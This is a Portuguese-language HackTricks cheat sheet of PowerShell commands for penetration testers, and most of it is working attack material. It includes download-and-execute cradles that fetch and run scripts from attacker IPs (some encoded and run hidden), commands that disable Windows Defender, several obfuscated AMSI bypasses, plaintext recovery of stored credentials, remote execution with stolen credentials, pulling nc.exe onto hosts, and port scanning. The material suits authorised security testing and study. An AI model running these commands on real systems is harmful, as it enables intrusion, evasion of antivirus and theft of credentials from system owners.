# PowerShell Básico para Pentesters
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras maneiras de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
## Localizações Padrão do PowerShell ```powershell C:\windows\syswow64\windowspowershell\v1.0\powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell ``` ## Comandos básicos do PowerShell para começar ```powershell Get-Help * #List everything loaded Get-Help process #List everything containing "process" Get-Help Get-Item -Full #Get full helpabout a topic Get-Help Get-Item -Examples #List examples Import-Module Get-Command -Module ``` ## Baixar e Executar ```powershell g echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3 $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd( #https://twitter.com/Alh4zr3d/status/1566489367232651264 #host a text record with your payload at one of your (unburned) domains and do this: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ``` ### Baixar e Executar em segundo plano com Bypass AMSI ```powershell Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=" ``` ### Usando b64 no Linux ```powershell echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0 powershell -nop -enc ``` ## Download ### System.Net.WebClient ```powershell (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") ``` ### Invoke-WebRequest ```powershell Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" ``` ### Wget ```powershell wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" ``` ### Transferência de Bits ```powershell Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output # OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` ## Base64 Kali & EncodedCommand ## Base64 Kali & EncodedCommand ```powershell kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 PS> powershell -EncodedCommand ``` ## [Política de Execução](../authentication-credentials-uac-and-efs/#ps-execution-policy) ## [Linguagem Confinada](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md) ## [Política do AppLocker](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md) ## Habilitar WinRM (PS Remoto) ```powershell enable-psremoting -force #This enables winrm # Change NetWorkConnection Category to Private #Requires -RunasAdministrator Get-NetConnectionProfile | Where{ $_.NetWorkCategory -ne 'Private'} | ForEach { $_ $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm } ``` ## Desativar o Defender {% code overflow="wrap" %} ```powershell # Check status Get-MpComputerStatus Get-MpPreference | select Exclusion* | fl #Check exclusions # Disable Set-MpPreference -DisableRealtimeMonitoring $true #To completely disable Windows Defender on a computer, use the command: New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force # Set exclusion path Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring Add-MpPreference -ExclusionPath (pwd) # Check exclusions configured via GPO Parse-PolFile .\Registry.pol KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions ValueName : Exclusions_Paths ValueType : REG_DWORD ValueLength : 4 ValueData : 1 KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths ValueName : C:\Windows\Temp ValueType : REG_SZ ValueLength : 4 ValueData : 0 ``` {% endcode %} ### Bypass AMSI O **`amsi.dll`** é **carregado** em seu processo e possui as **exportações necessárias** para qualquer aplicativo interagir. E porque está carregado no espaço de memória de um processo que você **controla**, você pode alterar seu comportamento **sobrescrevendo instruções na memória**. Tornando-o incapaz de detectar qualquer coisa. Portanto, o objetivo dos bypasses AMSI que você irá realizar é **sobrescrever as instruções desse DLL na memória para tornar a detecção inútil**. Página da web do **gerador de bypass AMSI**: [**https://amsi.fail/**](https://amsi.fail/) ```powershell # A Method [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) # Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1 $A="5492868772801748688168747280728187173688878280688776828" $B="1173680867656877679866880867644817687416876797271" [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B). substring(($_*2),2))})-replace " " ). GetField([string](38..51|%{[char][int](29+($A+$B). substring(($_*2),2))})-replace " ",'NonPublic,Static'). SetValue($null,$true) # Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI [Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true) # Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI &( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( ) # Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI ${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s') ${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c') ${1}.SetValue($null,$true) # Another Method $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils' $assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u)) $field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static') $field.SetValue($null,$true) # AMSI Bypass in python https://fluidattacks.com/blog/amsi-bypass-python/ # Testing for Amsi Bypass: https://github.com/rasta-mouse/AmsiScanBufferBypass # Amsi-Bypass-Powershell https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell https://blog.f-secure.com/hunting-for-amsi-bypasses/ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans https://slaeryan.github.io/posts/falcon-zero-alpha.html ``` ### AMSI Bypass 2 - Hooking de Chamada de API Gerenciada Verifique [**este post para informações detalhadas e o código**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Introdução: Esta nova técnica depende do hooking de chamadas de API de métodos .NET. Acontece que os métodos .NET precisam ser compilados em instruções de máquina nativas na memória, que acabam se parecendo muito com métodos nativos. Esses métodos compilados podem ser hookados para alterar o fluxo de controle de um programa. Os passos para realizar o hooking de chamadas de API de métodos .NET são: 1. Identificar o método alvo para hook 2. Definir um método com o mesmo protótipo de função que o alvo 3. Usar reflexão para encontrar os métodos 4. Garantir que cada método tenha sido compilado 5. Encontrar a localização de cada método na memória 6. Sobrescrever o método alvo com instruções apontando para nosso método malicioso ### AMSI Bypass 3 - Privilégio SeDebug [**Seguindo este guia e código**](https://github.com/MzHmO/DebugAmsi) você pode ver como, com privilégios suficientes para depurar processos, você pode iniciar um processo powershell.exe, depurá-lo, monitorar quando ele carrega `amsi.dll` e desativá-lo. ### AMSI Bypass - Mais Recursos * [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) * [Bypass Amsi no Windows 11 em 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi\_Bypass\_In\_2023) ## Histórico do PS ```powershell Get-Content C:\Users\\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt ``` ## Encontrar arquivos mais recentes Opções: `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc` ```powershell # LastAccessTime: (gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName # LastWriteTime: (gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName ``` ## Obter permissões ```powershell Get-Acl -Path "C:\Program Files\Vuln Services" | fl ``` ## Versão do sistema operacional e HotFixes ```powershell [System.Environment]::OSVersion.Version #Current OS version Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches Get-Hotfix -description "Security update" #List only "Security Update" patches ``` ## Ambiente ```powershell Get-ChildItem Env: | ft Key,Value -AutoSize #get all values $env:UserName @Get UserName value ``` ## Outras unidades conectadas ```powershell Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root ``` ### Lixeira ```powershell $shell = New-Object -com shell.application $rb = $shell.Namespace(10) $rb.Items() ``` [https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/) ## Reconhecimento de Domínio {% content-ref url="powerview.md" %} [powerview.md](powerview.md) {% endcontent-ref %} ## Usuários ```powershell Get-LocalUser | ft Name,Enabled,Description,LastLogon Get-ChildItem C:\Users -Force | select Name ``` ## String Segura para Texto Simples ```powershell $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring $user = "HTB\Tom" $cred = New-Object System.management.Automation.PSCredential($user, $pass) $cred.GetNetworkCredential() | fl UserName : Tom Password : 1ts-mag1c!!! SecurePassword : System.Security.SecureString Domain : HTB ``` Ou analisando diretamente a partir do XML: ```powershell $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List * UserName : Tom Password : 1ts-mag1c!!! SecurePassword : System.Security.SecureString Domain : HTB ``` ## SUDO ```powershell #CREATE A CREDENTIAL OBJECT $pass = ConvertTo-SecureString '' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("", $pass) #For local: Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')" #For WINRM #CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user) Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred #DOWNLOAD nc.exe Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}' #Another method $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) $computer = "" ``` ## Grupos ```powershell Get-LocalGroup | ft Name #All groups Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators ``` ## Área de transferência ```powershell Get-Clipboard ``` ## Processos ```powershell Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` ## Serviços ``` Get-Service ``` ## Senha a partir de uma string segura ```powershell $pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file $cred=new-object system.management.automation.pscredential("administrator", $pw) $cred.getnetworkcredential() | fl * #Get plaintext password ``` ## Tarefas Agendadas ```powershell Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` ## Rede ### Varredura de Portas ```powershell # Check Port or Single IP Test-NetConnection -Port 80 10.10.10.10 # Check Port List in Single IP 80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null # Check Port Range in single IP 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null # Check Port List in IP Lists - 80,443,445,8080 "10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null} ``` ### Interfaces ```powershell Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` ### Firewall ```powershell Get-NetFirewallRule -Enabled True Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow # Open SSH to the world New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow # Get name, proto, local and rremote ports, remote address, penable,profile and direction ## You can user the following line changing the initial filters to indicat a difefrent direction or action Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action ``` ### Rota ```powershell route print ``` ### ARP ```powershell Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State ``` ### Hosts ### Anfitriões ```powershell Get-Content C:\WINDOWS\System32\drivers\etc\hosts ``` ### Ping O comando `ping` é uma ferramenta comum usada para testar a conectividade de rede. Ele envia pacotes de dados para um host específico e aguarda por uma resposta. Isso pode ser útil para verificar se um host remoto está acessível pela rede. ```powershell $ping = New-Object System.Net.Networkinformation.Ping 1..254 | % { $ping.send("10.9.15.$_") | select address, status } ``` ### SNMP ```powershell Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` ## **Convertendo a String SDDL em um Formato Legível** ```powershell ```plaintext PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-384 ```markdown Proprietário : BUILTIN\Administrators Grupo : BUILTIN\Administrators DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions, Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed (CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions, WriteExtendedAttributes)...} SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse), BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users: SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess (Traverse)...} RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor ```
